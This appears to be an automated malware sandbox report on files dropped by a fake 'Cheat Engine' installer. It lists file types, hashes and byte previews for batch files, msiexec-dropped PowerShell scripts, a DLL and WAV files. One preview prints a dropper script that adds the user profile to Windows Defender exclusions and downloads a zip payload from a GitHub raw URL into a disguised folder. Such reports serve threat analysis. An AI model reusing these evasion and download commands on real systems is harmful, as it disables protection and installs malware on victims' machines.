              File Type:DOS batch file, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):4786
              Entropy (8bit):3.2043116914997
              Encrypted:false
              SSDEEP:
              MD5:AB5F71BB2F51F8B6F130B2BE083A382A
              SHA1:92DB0CAAD0B9C3AB6B8BE29C7FFA3ED3F8D09D72
              SHA-256:7B4E523830CAC46DD364741550F660887727368AEB4842E18EEBE390DC0BC874
              SHA-512:3B09E569527892BE9A47A659BEB58B237FF5E0A92640DD8EA7FC321C83EF9693F6D72DDA0DF89A12EBD735099B40F46274C8E0A86D23AE4F87F0769F2F6914C1
              Malicious:false
              Reputation:unknown
              Preview:..@.e.c.h.o. .o.f.f.....c.o.l.o.r. .0.A.....e.c.h.o. .C.H.E.A.T. .E.N.G.I.N.E. .S.C.R.I.P.T. .R.U.N.N.E.R. .....e.c.h.o. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._._._._._._._._._._._. ._. . .....e.c.h.o. . . .^.\.^./.^. . . . . . . . . . . . . . . . . . . . .^._.^._.^./.^. .^. .^. .^...^.:.^.:.^.:.^.:.^...^.-.^.'.^.-.^.(.^./.^.-.^./.^. . .....e.c.h.o. . . . . . . . . . . . . . . . . . . . . . ._./.:. . ...:.:.:.:...-.'. ...-.'.\./.\._.*.*.*.*.*.*.*. . . . . . . . . . .....e.c.h.o. . . . . . . . . . .\./. . . . . . . . . . ./.:. . ...:.:.:.:.../. . . .-..._.-... . .d.\.^.|. . . . . . . . . . . . . . . .....e.c.h.o. . . . . . . . . . . . . . . . . . . . . . . ./.:. .(."./. . . . .'... . .(._._./.^.|.^.|. . . . . . . . . . . . .....e.c.h.o. . . . . . . . . . . . . . . . . . . . . . . . .\.:.:.)...-.'. . .-..._. . .\./. .\.\./.\.^.|. . .....e.c.h.o. . . . . . . . . . . . . . . . ._._. ._. ...-.'.)./. . .'.-.'... ... .'... .^.|. . .(.i._.O. . .....e.c.h.o. . . . . . . .
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):2392
              Entropy (8bit):4.399875317323595
              Encrypted:false
              SSDEEP:
              MD5:845CF6630A4A8D184F93D0F732FEB846
              SHA1:1D9219177AAF25E5A95BDC72EC8CD6FD42E6CACE
              SHA-256:19F3274B5B004259D609E624E54259D1637074A97AB7E6452DDD2BD81EE29153
              SHA-512:BB6E45187EB464BA6EEC05C368EA13C43667307804B10215B5753209FB8D1CDACF0B1FB3460849069211AC76B8706C772F85704B7B7361626798CCE373BDAC1E
              Malicious:false
              Reputation:unknown
              Preview:@echo off..color 0A..echo CHEAT ENGINE SCRIPT RUNNER ..echo ___________ _ ..echo ^\^/^ ^_^_^/^ ^ ^ ^.^:^:^:^:^.^-^'^-^(^/^-^/^ ..echo _/: .::::.-' .-'\/\_******* ..echo \/ /: .::::./ -._-. d\^| ..echo /: ("/ '. (__/^|^| ..echo \::).-' -._ \/ \\/\^| ..echo __ _ .-')/ '-'. . '. ^| (i_O ..echo .-' \ -' '\^| ..echo _ _./ .-'^| '. ( \\ % % % ..echo .-' : '_ \ '-'\ /^|/ @ @ @ % % % % ..echo / )\_ '- )_________.-^|_/^\ @ @ @@@ % %\/% % ..echo ( .-' )-._-: / \(/\'-._ . @^|@@@@@ ..^|........ ..echo ( ) _//_/^|: / \() \_\ ^|/_@@ )'-._.-._.- ..echo ( ( \()^_/)_/ )/ \\ /
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6668
              Entropy (8bit):3.5127462716425657
              Encrypted:false
              SSDEEP:
              MD5:30C30EF2CB47E35101D13402B5661179
              SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
              SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
              SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
              Malicious:false
              Reputation:unknown
              Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):27728
              Entropy (8bit):4.054014061294072
              Encrypted:false
              SSDEEP:
              MD5:A8A3A992FCE81410C5771C10F743F6BA
              SHA1:D0DD0C52514AFA2150B250E549DFEBF87758F191
              SHA-256:BD580EA3519D7B9C2BC34D30B66AF13F580EE5BEB1CE828499F607300DBD9BEE
              SHA-512:3EDF26BA7095E2532CD0257F50A65C9F71EB85B768F27237F0BF538409CEA74E12BBCEC01BC0120F9D53BFB6A94B4BAC21A17595E259EE23D1A36FBF4615C830
              Malicious:true
              Reputation:unknown
              Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):3922
              Entropy (8bit):3.485978472693114
              Encrypted:false
              SSDEEP:
              MD5:B4F681D48CEA71BF4DD3ABB801358CB7
              SHA1:A008E22501E5062C1B77D6271817BCC54A470FEE
              SHA-256:D11012B0F68974184A369832E23A821B63ED66E44C2DB638C6E312322AFB0D3A
              SHA-512:41F45E80472D63E84B10DA49D06653F453B8B500EB3A3B3D2C7B6FC5BC3A74ACF866898DA78BB1171080E77DC63B259BB412FE081FB96471F9DC73F9FD8A5873
              Malicious:false
              Reputation:unknown
              Preview:..f.u.n.c.t.i.o.n. .S.h.o.w.-.M.e.s.s.a.g.e.B.o.x.1. .{.....[.C.m.d.l.e.t.B.i.n.d.i.n.g.(.).].....p.a.r.a.m.(..... . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.,. .P.o.s.i.t.i.o.n.=.0.).]..... . . . .[.s.t.r.i.n.g.].$.M.e.s.s.a.g.e.,..... . . . .[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).]..... . . . .[.s.t.r.i.n.g.].$.T.i.t.l.e. .=. .'.E.r.r.o.r.!.'.,..... . . . .[.V.a.l.i.d.a.t.e.S.e.t.(.'.O.K.'.,.'.O.K.C.a.n.c.e.l.'.,.'.A.b.o.r.t.R.e.t.r.y.I.g.n.o.r.e.'.,.'.Y.e.s.N.o.C.a.n.c.e.l.'.,.'.Y.e.s.N.o.'.,.'.R.e.t.r.y.C.a.n.c.e.l.'.).]..... . . . .[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.2.).]..... . . . .[.s.t.r.i.n.g.].$.B.u.t.t.o.n.s. .=. .'.O.K.'.,..... . . . .[.V.a.l.i.d.a.t.e.S.e.t.(.'.N.o.n.e.'.,.'.H.a.n.d.'.,.'.E.r.r.o.r.'.,.'.S.t.o.p.'.,.'.Q.u.e.s.t.i.o.n.'.,.'.E.x.c.l.a.m.a.t.i.o.n.'.,.'.W.a.r.n.i.n.g.'.,.'.A.s.t.e.r.i.s.k.'.,.'.I.n.f.o.r.m.a.t.i.o.n.'.).]..... . . . .[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.3.).]..... . . . .[.s.t.r.i.n.g.].$.I.c.o.n. .=. .'.E.r.r.o.r.'.,..... .
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF, LF line terminators
              Category:dropped
              Size (bytes):40308
              Entropy (8bit):3.9804622559749867
              Encrypted:false
              SSDEEP:
              MD5:B4AAF8EAA1AA2477670ED54128E2C742
              SHA1:B756FB677993BCF92916BE8979052ED14A6170DA
              SHA-256:5A4A897B8E922880F81B7AD94877ACF3B394FFFC1811D8826035B33D383624BA
              SHA-512:078503E1424578AA7A6791D1C962B801C1066958851D04EC4B8E24FC4AC5EECB4C013DC8484D04B5A5177A8BDED08BA743F98AC69C656F7B79039FC8D1D7C55F
              Malicious:true
              Reputation:unknown
              Preview:..$.E.r.r.o.r.A.c.t.i.o.n.P.r.e.f.e.r.e.n.c.e. .=. .'.S.i.l.e.n.t.l.y.C.o.n.t.i.n.u.e.'.....#. .B.l.o.c.k. .f.g.r.e.t.r.y.e.r.s...e.r.t.6.5.d.s.5.e.a.t.w.f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.....#. .B.l.o.c.k. .f.o.r.f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.....'.@.e.c.h.o. .o.f.f.'. .>. .$.e.n.v.:.T.E.M.P.\.p.r.o.g.r.e.s.s.b.a.d...b.a.t.....'.c.o.l.o.r. .0.A.'. .>.>. .$.e.n.v.:.T.E.M.P.\.p.r.o.g.r.e.s.s.b.a.d...b.a.t.....'.e.c.h.o. .C.H.E.A.T. .E.N.G.I.N.E. .S.C.R.I.P.T. .R.U.N.N.E.R. .'. .>.>. .$.e.n.v.:.T.E.M.P.\.p.r.o.g.r.e.s.s.b.a.d...b.a.t.....".e.c.h.o. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._._._._._._._._._._._. ._. . .". .>.>. .$.e.n.v.:.T.E.M.P.\.p.r.o.g.r.e.s.s.b.a.d...b.a.t.....".e.c.h.o. . . .^.\.^./.^. . . . . . . . . . . . . . . . . . . . .^._.^._.^./.^. .^.
              Process:C:\Windows\SysWOW64\msiexec.exe
              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
              Category:dropped
              Size (bytes):4
              Entropy (8bit):2.0
              Encrypted:false
              SSDEEP:
              MD5:64D1817B6BFCD6CFDA309F8910F51B57
              SHA1:9FAF2D4A707B789DE6970B53B0DC80AC47EC3C52
              SHA-256:067838889A9EEB91ECB3FC155F3BFED21BD86D8C789D6485CCA2A6D6A6BD4391
              SHA-512:D51EC763F8F2920782D958C84A5FB96D7E80382D88BC9A41EC0CA6E2570EBB328389EAD37E4042C83D025A1E3580444F6374FFA015374D6C20C75F9EC85BA7EE
              Malicious:true
              Reputation:unknown
              Preview:.. .
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):5038592
              Entropy (8bit):6.043058205786219
              Encrypted:false
              SSDEEP:
              MD5:11F7419009AF2874C4B0E4505D185D79
              SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
              SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
              SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):12036
              Entropy (8bit):6.071529333630433
              Encrypted:false
              SSDEEP:
              MD5:BECEB9C4AC840A5AC0B51D8774E63149
              SHA1:EA375FEE5FF404065BA724E877C9A9B01509353B
              SHA-256:D2011DCD715DAD784B01709BD0AF62C07A91AAD758F6E461005178A74C2D3B34
              SHA-512:48E705691523F9804E152433C15142757DEF6E8DFA72F5DD08169576F7A5073D5E43CCE1E148F7DF19A566FB863CD377ADFCDBEAB5308B4CAFE9AFEC9715365D
              Malicious:false
              Reputation:unknown
              Preview:$ErrorActionPreference = 'SilentlyContinue'..Timeout /NOBREAK /T 5..$File = "$env:localappdata\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"..if (Test-Path -Path $File) {..exit..}..$vrer2 = "$env:userprofile"..Add-MpPreference -ExclusionPath "$vrer2" -Force..New-Item -Path "$env:localappdata\Microwave\Vault\TelemetryHandlers\winupdates" -ItemType Directory..# Block for declaring the script parameters...# Block for declaring the script parameters...# Block for declaring the script parameters...# Block for declaring the script parameters...$WebFile = "https://raw.githubusercontent.com/washywashy14/7zip-bin/master/win/Uemlxaw.zip"..# Block for declaring the script parameters...# Block for declaring the script parameters...# Block for declaring the script parameters...# Block for declaring the script parameters...$Outff = "$env:localappdata\Microwave\Vault\TelemetryHandlers\winupdates\Uemlxaw.zip"..Invoke-WebRequest -uri $WebFile -OutFile $Outff..Timeout /NOBREAK
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.877578846983099
              Encrypted:false
              SSDEEP:
              MD5:639EB4627992165DAD32AD41DF746BF7
              SHA1:286D70C527D4A0D03C5FEB0348F6D6E507AFAAED
              SHA-256:FB5A9508C75910052B7761A50028084912581EEC358F6378D5865A531B71CA64
              SHA-512:886C1453DAC99F4EBF8E3918641DA602A0BD062A0111E4187BE6A9EA4B11182DB2D093CE8F28A21347645B74B67AA6C9D0FB1970A521E4AD8C6F0626864E8640
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%......................................... .4....... .q.C.............?.............2.U...U.~.g.....:.......9.G...\.......F.......?.W.....n...,.C...J.a.I.........y.....J.v...d..............h.r.d......>.r.6........".....@..........'2q.B.k.s..!..J.v....).>>...o..........Y.'3W *...c...J.g.`...D".-..j.V.I...../.h.<.U.S.....'.....a....).....Y.D.......b....>.g.....z.....Y...?.A...!.............R.K.......i...........:.8.+...........A.Z.....{...d.{...........$.........!..\......+S(..8....f$....y..,.=q....\).:~.......>0.=......+e...b...G3n...@.Z.(&..-.,.D.n"....................../..V.....?.%.r............W............[.%.....y....A.?.......?.........%.w.@.e...............o.S.g............K.. ;.y......#.@...P..,t.".x.r..&s.d.p.f.5;.......D*b...,...F.......-..l...BDd%e............Q.D2............../..)......z...:.4..._..$......L..........<............D........s....... ....>...........C.i...c.....q.t.n.....S.....w..#{.}.J..
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):2.6724046043990817
              Encrypted:false
              SSDEEP:
              MD5:123437D6F80FE45F397A067CE4872D89
              SHA1:3B981369C54593B4DCFD3F7E08DB8F3E67A3FBA9
              SHA-256:25289632DCCC370B326D589D06169C7383C0A39B6D220DD468A01C785D54ABF9
              SHA-512:25B245F916B58CD359EE017CF48171CC3624C87E7941565DB5AE9D06FB3CB6A68423F4C39CC38C8A66BBE280E2A048A04D84D83700D35ED5C537D4D6525EB623
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%............................. .'.'.1.?.T.].^.y.............?.f.......J.....,.^.....^.....G...=...D.....U.......................i...Y.....,...n...x.....N...'...\.....#...L....7...i....*..."...........(.........\.H.}...k........9.....~.....0...k.f.*........q...7.+.Y.....d.7............#...2.........*....|.....+.!.}.......A.....?...-...1...........R.....4.x.,.........K...Y.w.5.1.x.......G.....+.......*.........l.....K.........V..p.F....8...G..t.p.f.v...U...J...$.E....M..K...@..Z...9...W...Z.`.,...Q.1.....Q.x.r.[.0...i..b.^.....i..P.....z.....Y.....v.......5.N..........S.=....+.....1..h...V.......i........S.......{.....M.u...3.z.....w...`...a...X...=.\...........].*.......1......./.r.....e...........D.............b...\.......................@.#...........-.................x... ...x.$.....%.....L.........U.....l.....................+.....D.......~...............7...f...R.....n...~...b...G...5.......|... ...........W...
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):5.268896846573217
              Encrypted:false
              SSDEEP:
              MD5:82E152E8A610DA8132789C9D4A4D1D3F
              SHA1:055180B27A639248C3BE0B2D875630AE256D9890
              SHA-256:82040461EEBB7AAF3C6055884ABCC642300FF37D241A1B7EE794E0B0B45B88D7
              SHA-512:77E525487B3D7BE2D473FC296445BFB2C06EC9DDD0CB5C0B174E40101F98326D48FD2DA797E327B1FB333E5EA56FD5D1EF14582E92A5591E60DA3260619C67BF
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.......................................................................&.7.F.P.T.P.B.).................................................e... .....d.........u..... .....V.......@.....,.Z.:.............).X.........g.........X.....x...!...............x.....=.....y.^...u...............v.b.;...L.O.........5.w.............F...8.S.......C.E.....S...........q.G.!.....e...0...%.........-.....p.......5.G.....k.5.(.=.[.y.......c.....q.>.6.%...J.........3...@.F.j...........J.........'...B...".....F...-.....................m.e.....7...0...T.......(....._.......Y...N...4.....A.........T.......L...............K.w...................'.......=.....Z.........C...A...M.........<.D.].....U.......u.5.6.%.........&.).r.....{.J.....d...Y.h.;.....u...@.....~...'...J.+.............T.\.Q.......r................._.x.......~...............).!.....].*...............I.!..........._.O.......0...,...l.........$.....M...].#.........l.....3...y...............(.y...7...J.....4...
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.089318169166504
              Encrypted:false
              SSDEEP:
              MD5:B1938437BFC4C13E424990F4D3F2353A
              SHA1:FC63B1E664C5EA8FAA8B5DF75A2756E59AE7A40A
              SHA-256:D531ED6375A6ADE4D449389B67E0A312FC97F3FBD025A627ABD72F2705FDBC26
              SHA-512:680179878406763EB57112FCD942F58FCF089B6FC6C6A7B19EE0FE2EC69B5ECA218539AFB8D10C55B6901B273CFAE93DEC52E8A3A46F5E8AA684079BE70547AB
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.3238565119681995
              Encrypted:false
              SSDEEP:
              MD5:DE35645B9BCA5DEE784285EE52AA407E
              SHA1:3E23801FBA4D83EF2C8F2ED772B0AEDD8B1395B9
              SHA-256:A5289B50B6178E8B4C3EA814A0C25CF4B4C2C8E3A0E30E416DBDAC49A61D3864
              SHA-512:78C8BA646941D8806FDDAA6A0BA1154DAA1463703651D625A230422374B157D63BD2959FA8B561CC1E9E40B5601B65F36AAE85D158D85CDF0460E5E7F637A17D
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.7163374755775385
              Encrypted:false
              SSDEEP:
              MD5:4A1D53E7FD0F268A7FD23FB9B3139EE3
              SHA1:A80942C3CAB97EA97B2406FAB965BB4B3C16C2FE
              SHA-256:7832608E235911200D1C224C201D3AEFEFE3B154911A53C2507CD83E31447C1F
              SHA-512:CC00E720B65246BD0AD30DEC09A35A5BC0F409645F47D8576649036408A258B7A372C0E4F5F16B222A9965A92CD2DD03FD6F782BEC5F1A85438A339C310DFD01
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):5.154175266802094
              Encrypted:false
              SSDEEP:
              MD5:0390E78A8086536F56E11B0B40BE2D62
              SHA1:BA61E82CCE9E0EF301DB174F83E94B9244FAA799
              SHA-256:9102B9E757CEA1FDDFFD0F82888FF829AF7F11F6C522A31939FD54DAF0B3AA22
              SHA-512:6182190E88CCBBB060A6779B97E27794AA69252F4196B307165006D57234AEEE62283C1CFB41D405847C5079D3828706CAB648281D40DAFAF9CB10984868B1E9
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.^...D............@...U.9.p...........#............n..9...W.....=...y.\.V.........Y.....G.....l..:...........s...'....R...B.3.....l.....j.@.....E....&.....M..... ......^.#.....-.q.......2...2.]"..1.j.....(. .m....~........&........*9....,.-.g*..$.9.C.Q.......u.[ 5...!...5 n....B.+..#....U.!..(N....".n!....m..e&........d.......0...#.........'L......V)6.|.q....,.)..%..."2)..].3..46\...S.U.g*..G.r..............!o.3..)..'L(.. ......"..R...-....W.0..&......t..4..2.G.)..2.......6=!.... ..1. ,.....I-F3.........!..o.... U2....:....)g................E'..N.....-B...n..!&.....+..5..R..L..+......O.m2i.y.....+....._.n4R((.....(,#S.u.J.(N-......6.}...S...(.(.....B.........-.,....j..!m.H...>.Q,.0....v. &`#.....=#F6y..... '.M. ...{.:6....6.N..,v.......6l.l.....*(..G..d..5......,,.........6..U....*..y.H.X..7........B3....V....9?.....P..3..p....2..v...? ..|.L..*..3e.....5..)5...N..!B/^.......L"U....(-.,H.o...'.$
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):5.473088920355396
              Encrypted:false
              SSDEEP:
              MD5:5B88B489CE5A9207F1B60669D32F7A0E
              SHA1:D2BA6F65E8091324B5042BAEFD58BDE2177FA724
              SHA-256:216FDAAC90960EE05FF540FE214CFDC314B4AE57892437C940EB7B0EDB9BC87F
              SHA-512:DF3BF926E4C85ADC21599348442B4E8093885030D9DD0FDA3EA0A50606CFD1CD805EE89CDD7F43C48863671E68309955FAC14E50BB157590E6984A2233333B29
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.k.......................k...}.w.U...z.'.E.}...|.0.g.[...7.......W.......^.X...1.....R.U.~...V.i.....9.I.T.....j.......+.......M.......N...d...&...X.....{...y.....<...v...E...L.....U.......[.......5.X.q.........s.u.........!.>.....B.....8.n.....+.8.\...p...b...j...=.............R.A.../...g.....s.........x...s...........M...~...4.P...........#...................+.I.~.......?.T...........(.)...w.:.'.......8...U...........B.........\.>...n.........4...p.....3.....F. . .I.a...E.~.....0.....(...2...~.h...................`.......:.S..._.............(.m.....[.......t...|...g.j...R.^.....Q.........X...............P.............Y...........E.......@...b.S...i...i...o.....L.N.I...@.?...........A.....C.t...........~...C.....(...d.6.....S.........(.".4.^.....9./...L.............!...3...y.<.........q.5.6.............+.;.p.....Z.t.....R.......'.W...<......._.......3.....!.=.....S.........w.....9.'.Y./...,.........:.Z...........v.........1...K..."...e.1.4...
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.360574588423412
              Encrypted:false
              SSDEEP:
              MD5:9C82673085C3D170DFA63A6C7BE31776
              SHA1:3A753DA6E8FEF9A09E841DC2CD1F7D97832DFB65
              SHA-256:0FBF274C9A44E2E2842423BDFE570A5BA7CBD4E1C4AC5446E45C56D022FB1FB7
              SHA-512:D42E2CAF6B76A715139D7DA3E172D1B7ABECBC424FE7A8FA4CE4AD371D2C199873ECA4882B0F51DF81C8C18749D846C887F49D92B4D83EF77708436D83E64638
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.349684310935958
              Encrypted:false
              SSDEEP:
              MD5:9D8691FD2B28078CAC74060D0FD33BF7
              SHA1:21D9FA20835C46CEC90641380EA9AA71C57AB85E
              SHA-256:1BBF3A28BC06757CB8A3B19BC7186C583594B18AC459DF231CF9C9AABB1F3BB9
              SHA-512:626E71144737BA2E057A426A7F6C59F1B92DC52141752F6A8711AF969574E441C1582C038B4254C917126EE656F17281BEA7A8A093E1E05EFF55B4D54DCEEA50
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.162898325597114
              Encrypted:false
              SSDEEP:
              MD5:FDC8F9825BAC64DBDCEFF1B1ECFBCF53
              SHA1:D831B8FC76023AF06B13A05811C18611B7C394F3
